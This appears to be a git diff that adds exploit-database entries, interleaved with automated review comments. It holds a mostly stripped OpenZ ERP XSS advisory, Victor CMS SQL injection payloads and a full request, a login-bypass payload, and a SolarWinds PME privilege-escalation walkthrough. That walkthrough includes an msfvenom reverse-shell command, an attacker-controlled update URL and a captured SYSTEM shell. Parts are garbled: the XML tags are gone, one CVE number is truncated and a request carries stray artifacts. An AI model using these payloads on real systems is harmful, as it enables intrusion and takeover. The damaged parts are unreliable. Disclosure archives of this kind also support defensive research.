+inpcGreetingId=&inpcBpartnerId=8BEB3E9FD5D24F9BBCF777A51D53F5AF&inpissummary=N&inprating=N&inpTableId=AC9B98C649CD4F55B37714008EE8519F&
+inpkeyColumnId=C_BPartner_ID&inpKeyName=inpcBpartnerId&mappingName=/org.openbravo.zsoft.smartui.Employee/
+EmployeeA3D0B320B69845B386024B5FF6B1E266_Relation.html&inpwindowId=39D3CD9F77A942D690965D49106F011B&
+inpTabId=A3D0B320B69845B386024B5FF6B1E266&inpCommandType=EDIT&updatedTimestamp=20200426170335&inpParentOrganization=&
+inpadOrgId=1AF9E07685234E0A9FEC1D9B58A4876B&inpadImageId=&
+inpvalue=325235&inpname=>">&
+inpdescription=>">&inpimageurl=31337&
+inpisactive=Y&inpisinresourceplan=Y&inpapprovalamt=0,00&inpcSalaryCategoryId=&inptaxid=&inpreferenceno=&
+inpcBpGroupId=42691AE1D13F400AB814B70361E167C3&inpadLanguage=de_DE&inpcountry=Deutschland&inpzipcode=&
+inpcity=&inpcreated=26-04-2020
+17:03:35&inpcreatedby=Service&inpupdated=26-04-2020
+17:03:35&inpupdatedby=Service
+-
+POST: HTTP/1.1 302 Found
+Server: Apache/2.4.38 (Debian)
+Location:
+https://localhost:8080/openz/org.openbravo.zsoft.smartui.Employee/EmployeeA3D0B320B69845B386024B5FF6B1E266_Relation.html?Command=RELATION
+Content-Length: 0
+Keep-Alive: timeout=5, max=100
+Connection: Keep-Alive
+Content-Type: text/html; charset=UTF-8
+- (Execution in Listing)
+https://localhost:8080/openz/org.openbravo.zsoft.smartui.Employee/evil.source
+Host: myerponline.de
+Accept:
+text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
+Connection: keep-alive
+Referer:
+https://localhost:8080/openz/org.openbravo.zsoft.smartui.Employee/SalesRepVendor8BAE92BA22C14B1487EB2B247FA4A977_Edition.html
+Cookie: JSESSIONID=0692EC25BA33001B002059E182BA1544;
+_ga=GA1.2.403279990.1587913275; _gid=GA1.2.274268317.1587913275
+-
+GET: HTTP/1.1 200 OK
+Server: Apache/2.4.38 (Debian)
+Content-Type: text/html;charset=utf-8
+Content-Language: en
+Content-Length: 1110
+Keep-Alive: timeout=5, max=97
+Connection: Keep-Alive
+
+
+PoC: Vulnerable Source (/security/Menu.html)
+
+
+
+
+
+
+
+
+
+
Business Partner:
+
325235 -
+>">
+
+
+
+Reference(s):
+https://localhost:8080/
+https://localhost:8080/openz/org.openbravo.zsoft.smartui.Employee/
+https://localhost:8080/openz/org.openbravo.zsoft.smartui.Employee/Employee
+
+
+Credits & Authors:
+==================
+Vulnerability-Lab -
+https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab
+Benjamin Kunz Mejri -
+https://www.vulnerability-lab.com/show.php?user=Benjamin%20K.M.
+
+
+--
+VULNERABILITY LABORATORY - RESEARCH TEAM
\ No newline at end of file
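Review bot: The "Execution in Listing" request carries `Host: myerponline.de` while every URL around it is `https://localhost:8080/...`, so one real-looking hostname seems to have survived sanitising. If the test ran against localhost, the line should read `Host: localhost:8080` like the first request. The parameter is spelled `inpdescripción` in the description but `inpdescription` in the parameter list and the request, and the file appears as `menu.html`, `Menu.html` and `/security/Menu.html`. The injected values are reduced to `>">` and the "Vulnerable Source" block is mostly blank, which suggests markup was stripped on import. No fixed version or mitigation is listed.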
diff --git a/exploits/php/webapps/48451.txt b/exploits/php/webapps/48451.txt
new file mode 100644
index 000000000..43687ce6e
--- /dev/null
+++ b/exploits/php/webapps/48451.txt
@@ -0,0 +1,52 @@
+# Exploit Title: Victor CMS 1.0 - 'post' SQL Injection
+# Google Dork: N/A
+# Date: 2020-05-09
+# Exploit Author: BKpatron
+# Vendor Homepage: https://github.com/VictorAlagwu/CMSsite
+# Software Link: https://github.com/VictorAlagwu/CMSsite/archive/master.zip
+# Version: v1.0
+# Tested on: Win 10
+# CVE: N/A
+# my website: bkpatron.com
+
+# Discription:
+# The Victor CMS v1.0 application is vulnerable to SQL injection via the 'post' parameter on the post.php page.
+# vulnerable file : post.php
+http://localhost/CMSsite-master/post.php?post=1
+
+
+Parameter: post (GET)
+ Type: boolean-based blind
+ Title: AND boolean-based blind - WHERE or HAVING clause
+ Payload: post=1 AND 2333=2333
+
+ Type: error-based
+ Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
+ Payload: post=1 AND (SELECT 4641 FROM(SELECT COUNT(*),CONCAT(0x7178787871,(SELECT (ELT(4641=4641,1))),0x717a627171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)
+
+ Type: time-based blind
+ Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
+ Payload: post=1 AND (SELECT 7147 FROM (SELECT(SLEEP(5)))vltp)
+
+ Type: UNION query
+ Title: Generic UNION query (NULL) - 7 columns
+ Payload: post=1 UNION ALL SELECT NULL,NULL,NULL,NULL,CONCAT(0x7178787871,0x54487357657079447543667943786c4f7a634a654a707448516e6f6e6241674f4c4a50477164646c,0x717a627171),NULL,NULL-- PTYU
+
+[INFO] the back-end DBMS is MySQL
+web application technology: PHP, Apache 2.4.39, PHP 7.2.18
+back-end DBMS: MySQL >= 5.0
+# Proof of Concept:
+http://localhost/CMSsite-master/post.php?post=sqli
+
+http://localhost/CMSsite-master/post.php?post=1%20UNION%20ALL%20SELECT%20NULL,NULL,NULL,NULL,CONCAT(0x7178787871,0x54487357657079447543667943786c4f7a634a654a707448516e6f6e6241674f4c4a50477164646c,0x717a627171),NULL,NULL--%20PTYU
+
+GET /CMSsite-master/post.php?post=1%20UNION%20ALL%20SELECT%20NULL,NULL,NULL,NULL,CONCAT(0x7178787871,0x54487357657079447543667943786c4f7a634a654a707448516e6f6e6241674f4c4a50477164646c,0x717a627171),NULL,NULL--%20PTYU HTTP/1.1
+Host: localhost
+User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:56.0) Gecko/20100101 Firefox/56.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Cookie: PHPSESSID=gd27m8o57gcb23t7se4d4tdv1g
+Connection: keep-alive
+Upgrade-Insecure-Requests: 1
+post=1%20UNION%20ALL%20SELECT%20NULL,NULL,NULL,NULL,CONCAT(0x7178787871,0x54487357657079447543667943786c4f7a634a654a707448516e6f6e6241674f4c4a50477164646c,0x717a627171),NULL,NULL--%20PTYU
\ No newline at end of file
diff --git a/exploits/php/webapps/48452.txt b/exploits/php/webapps/48452.txt
new file mode 100644
index 000000000..8d093d16f
--- /dev/null
+++ b/exploits/php/webapps/48452.txt
@@ -0,0 +1,29 @@
+# Exploit Title: complaint management system 1.0 - Authentication Bypass
+# Google Dork: N/A
+# Date: 2020-05-10
+# Exploit Author: BKpatron
+# Vendor Homepage: https://www.sourcecodester.com/php/14206/complaint-management-system.html
+# Software Link: https://www.sourcecodester.com/sites/default/files/download/razormist/complaint-management-system.zip
+# Version: v1.0
+# Tested on: Win 10
+# CVE: N/A
+
+# Vulnerability: Attacker can bypass login page and access to dashboard page
+# vulnerable file : admin/index.php
+# Parameter & Payload: '=''or'
+# Proof of Concept:
+http://localhost/Complaint%20Management%20System/admin/
+
+POST /Complaint%20Management%20System/admin/ HTTP/1.1
+Host: localhost
+User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:56.0) Gecko/20100101 Firefox/56.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 61
+Referer: http://localhost/Complaint%20Management%20System/admin/
+Cookie:PHPSESSID=6d1ef7ce1b4rgp44ep3iqncfn4
+Connection: keep-alive
+Upgrade-Insecure-Requests: 1
+username=%27%3D%27%27or%27&password=%27%3D%27%27or%27&submit=: undefined
\ No newline at end of file
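Review bot: The advisory names `admin/index.php` as the vulnerable file but ends without any remediation, so a defender reading it learns only that the login can be bypassed. The payload shape suggests the login query is built by concatenating the username and password fields, though the PHP source is not shown here; if so, a closing line such as `# Fix: build the login query in admin/index.php with prepared statements and bound parameters` would make the entry actionable. Separately, the last line of the captured request ends in `: undefined`, which does not fit the declared `Content-Length: 61` and looks like a proxy or copy artifact, and the body is not separated from the headers by a blank line.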
diff --git a/exploits/windows/local/48448.txt b/exploits/windows/local/48448.txt
new file mode 100644
index 000000000..afc3f6f4b
--- /dev/null
+++ b/exploits/windows/local/48448.txt
@@ -0,0 +1,166 @@
+# Title: SolarWinds MSP PME Cache Service 1.1.14 - Insecure File Permissions
+# Author: Jens Regel, Schneider & Wulf EDV-Beratung GmbH & Co. KG
+# Date: 2020-05-06
+# Vendor: https://www.solarwindsmsp.com/
+# CVE: CVE-2020-1260
+# GitHub: https://github.com/jensregel/Advisories/tree/master/CVE-2020-12608
+# CVSSv3: 8.2 [CVSS:3.0/AV:L/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:H]
+# CWE: 276
+
+Vulnerable version
+==================
+SolarWinds MSP PME (Patch Management Engine) before 1.1.15
+
+Timeline
+========
+2020-04-24 Vulnerability discovered
+2020-04-27 Send details to SolarWinds PSIRT
+2020-04-27 SolarWinds confirmed the vulnerability
+2020-05-05 SolarWinds released PME version 1.1.15
+2020-05-06 Public disclosure
+
+Description
+===========
+An error with insecure file permissions has occurred in the SolarWinds
+MSP Cache Service, which is part of the Advanced Monitoring Agent and
+can lead to code execution. The SolarWinds MSP Cache Service is
+typically used to get new update definition files and versions for
+ThirdPartyPatch.exe or SolarWinds MSP Patch Management Engine Setup. The
+XML file CacheService.xml in %PROGRAMDATA%\SolarWinds
+MSP\SolarWinds.MSP.CacheService\config\ is writable by normal users, so
+that the parameter SISServerURL can be changed, which controls the
+location of the updates. After some analysis, we were able to provide
+modified XML files (PMESetup_details.xml and
+ThirdPartyPatch_details.xml) that point to an executable file with a
+reverse TCP payload using our controlled SISServerURL web server for
+SolarWinds MSP Cache Service.
+
+Proof of Concept (PoC)
+======================
+As we can see, NTFS change permissions are set to CacheService.xml by
+default. Any user on the system who is in group users can change the
+file content. This is especially a big problem on terminal servers or
+multi-user systems.
+
+PS C:\ProgramData\SolarWinds MSP\SolarWinds.MSP.CacheService\config>
+icacls .\CacheService.xml
+.\CacheService.xml VORDEFINIERT\Benutzer:(I)(M)
+NT-AUTORITÄT\SYSTEM:(I)(F)
+VORDEFINIERT\Administratoren:(I)(F)
+
+1. Modify CacheService.xml
+
+In the xml file, the parameter SISServerURL was adjusted, which now
+points to a web server controlled by the attacker.
+
+
+
+True
+1.1.14.2223
+C:\ProgramData\SolarWinds
+MSP\SolarWinds.MSP.CacheService\cache
+10240
+https://evil-attacker.example.org
+5
+
+AQAAANCMnd8BFdER(...)
+
+
+
+RMM
+True
+1
+300
+1
+
+
+2. Payload creation
+
+Generate an executable file, for example using msfvenom, that
+establishes a reverse tcp connection to the attacker and store it on the
+web server.
+
+msfvenom -p windows/x64/shell_reverse_tcp lhost=x.x.x.x lport=4444 -f
+exe > /tmp/solarwinds-shell.exe
+
+3. Prepare web server
+
+Place the modified xml files (PMESetup_details.xml or
+ThirdPartyPatch_details.xml) on the web server in the path
+/ComponentData/RMM/1/, calculate MD5, SHA1 and SHA256 checksums of the
+executable, set correct values for SizeInBytes and increase the version.
+
+Example of PMESetup_details.xml
+
+
+Patch Management Engine
+Patch Management Engine
+7a4a78b105a1d750bc5dfe1151fb70e1
+3d9ed6bd44b5cf70a3fed8f511d9bc9273a1feac
+
+80579df2533d54fe9cbc87aed80884f6a97e1ccdd0443ce2bcb815ef59ed3d65
+
+7168
+/ComponentData/RMM/1/solarwinds-shell.exe
+solarwinds-shell.exe
+x86,x64
+all
+1.1.14.2224
+
+
+Example of ThirdPartyPatch_details.xml
+
+
+Third Party Patch
+
+Third Party Patch application for Patch Management Engine RMM v 1 and later
+
+7a4a78b105a1d750bc5dfe1151fb70e1
+3d9ed6bd44b5cf70a3fed8f511d9bc9273a1feac
+
+80579df2533d54fe9cbc87aed80884f6a97e1ccdd0443ce2bcb815ef59ed3d65
+
+7168
+/ComponentData/RMM/1/solarwinds-shell.exe
+solarwinds-shell.exe
+x86,x64
+all
+1.2.1.95
+
+
+4. Malicious executable download
+
+After restarting the system or reloading the CacheService.xml, the
+service connects to the web server controlled by the attacker and
+downloads the executable file. This is then stored in the path
+%PROGRAMDATA%\SolarWinds MSP\SolarWinds.MSP.CacheService\cache\ and
+%PROGRAMDATA%\SolarWinds MSP\PME\archives\.
+
+[24/Apr/2020:10:57:01 +0200] "HEAD
+/ComponentData/RMM/1/solarwinds-shell.exe HTTP/1.1" 200 5307 "-" "-"
+[24/Apr/2020:10:57:01 +0200] "GET
+/ComponentData/RMM/1/solarwinds-shell.exe HTTP/1.1" 200 7585 "-" "-"
+
+5. Getting shell
+
+After a certain time the executable file is executed by SolarWinds MSP
+RPC Server service and establishes a connection with the rights of the
+system user to the attacker.
+
+[~]: nc -nlvp 4444
+Listening on [0.0.0.0] (family 0, port 4444)
+Connection from [x.x.x.x] port 4444 [tcp/*] accepted (family 2, sport 49980)
+Microsoft Windows [Version 10.0.18363.778]
+(c) 2019 Microsoft Corporation. Alle Rechte vorbehalten.
+
+C:\WINDOWS\system32>whoami
+whoami
+nt-authority\system
+
+C:\WINDOWS\system32>
+
+Fix
+===
+There is a new PME version 1.1.15 which comes with auto-update
+https://success.solarwindsmsp.com/forum-post/X0D51T00007TMk6jSAD/
\ No newline at end of file
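Review bot: The `# CVE:` header line reads CVE-2020-1260, while the GitHub advisory path on the very next line reads CVE-2020-12608, so the identifier appears to have lost its last digit and would send readers to a different CVE record; after checking the advisory I would change it to `# CVE: CVE-2020-12608`. The CacheService.xml, PMESetup_details.xml and ThirdPartyPatch_details.xml examples have also lost their element tags, leaving bare values, so it is no longer visible which value is SISServerURL or which hash is which. For defenders, the Fix section could add that on hosts still below 1.1.15 the thing to audit is the ACL shown in the icacls output, where the Users group holds modify (M) on CacheService.xml, along with any unexpected change to the SISServerURL value.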
diff --git a/files_exploits.csv b/files_exploits.csv
index 34f4a6cc6..8deb08b13 100644
--- a/files_exploits.csv
+++ b/files_exploits.csv
@@ -11069,6 +11069,7 @@ id,file,description,date,author,type,platform,port
48414,exploits/windows/local/48414.txt,"Outline Service 1.3.3 - 'Outline Service ' Unquoted Service Path",2020-05-04,"Minh Tuan",local,windows,
48415,exploits/windows/local/48415.py,"Frigate 3.36 - Buffer Overflow (SEH)",2020-05-04,"Xenofon Vassilakopoulos",local,windows,
48418,exploits/windows/local/48418.txt,"Oracle Database 11g Release 2 - 'OracleDBConsoleorcl' Unquoted Service Path",2020-05-05,"Nguyen Khang",local,windows,
+48448,exploits/windows/local/48448.txt,"SolarWinds MSP PME Cache Service 1.1.14 - Insecure File Permissions",2020-05-11,"Jens Regel",local,windows,
1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
@@ -42674,3 +42675,13 @@ id,file,description,date,author,type,platform,port
48438,exploits/php/webapps/48438.txt,"Online Clothing Store 1.0 - Arbitrary File Upload",2020-05-07,"Sushant Kamble",webapps,php,
48439,exploits/php/webapps/48439.txt,"Pisay Online E-Learning System 1.0 - Remote Code Execution",2020-05-07,boku,webapps,php,
48440,exploits/php/webapps/48440.txt,"Online AgroCulture Farm Management System 1.0 - 'pid' SQL Injection",2020-05-07,BKpatron,webapps,php,
+48442,exploits/linux/webapps/48442.py,"Pi-hole < 4.4 - Authenticated Remote Code Execution",2020-05-10,"Nick Frichette",webapps,linux,
+48443,exploits/linux/webapps/48443.py,"Pi-hole < 4.4 - Authenticated Remote Code Execution / Privileges Escalation",2020-05-10,"Nick Frichette",webapps,linux,
+48444,exploits/php/webapps/48444.txt,"Online AgroCulture Farm Management System 1.0 - 'uname' SQL Injection",2020-05-11,"Tarun Sehgal",webapps,php,
+48445,exploits/aspx/webapps/48445.txt,"Kartris 1.6 - Arbitrary File Upload",2020-05-11,"Nhat Ha",webapps,aspx,
+48446,exploits/php/webapps/48446.txt,"Sentrifugo CMS 3.2 - Persistent Cross-Site Scripting",2020-05-11,Vulnerability-Lab,webapps,php,
+48447,exploits/php/webapps/48447.txt,"CuteNews 2.1.2 - Arbitrary File Deletion",2020-05-11,Besim,webapps,php,
+48450,exploits/php/webapps/48450.txt,"OpenZ ERP 3.6.60 - Persistent Cross-Site Scripting",2020-05-11,Vulnerability-Lab,webapps,php,
+48451,exploits/php/webapps/48451.txt,"Victor CMS 1.0 - 'post' SQL Injection",2020-05-11,BKpatron,webapps,php,
+48452,exploits/php/webapps/48452.txt,"Complaint Management System 1.0 - Authentication Bypass",2020-05-11,BKpatron,webapps,php,
+48453,exploits/multiple/webapps/48453.txt,"LibreNMS 1.46 - 'search' SQL Injection",2020-05-11,Punt,webapps,multiple,